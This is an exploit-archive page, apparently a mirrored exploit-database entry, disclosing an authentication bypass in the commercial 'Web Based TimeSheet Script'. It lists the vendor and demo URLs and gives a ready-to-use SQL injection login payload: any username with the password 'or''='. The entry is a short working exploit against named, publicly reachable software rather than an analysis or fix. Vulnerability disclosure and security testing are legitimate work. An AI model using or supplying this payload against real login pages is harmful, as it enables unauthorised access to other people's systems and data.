Home / os / winmobile

Web Based TimeSheet Script SQL Injection

Posted on 30 November -0001

<HTML><HEAD><TITLE>Web Based TimeSheet Script SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># # # # # # Exploit Title: Web Based TimeSheet Script - Authentication Bypass # Google Dork: N/A # Date: 26.01.2017 # Vendor Homepage: http://qualitypointtech.net/ # Software Buy: http://www.qualitypointtech.com/webtimesheet/ # Demo: http://qualitypointtech.net/timesheetdemo/index.php # Version: N/A # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[beygir]ihsan[nokta]net # # # # # # Exploit : # http://localhost/[PATH]/ and set Username:anything Password:'or''=' and hit enter. # # # # # </BODY></HTML>

 

TOP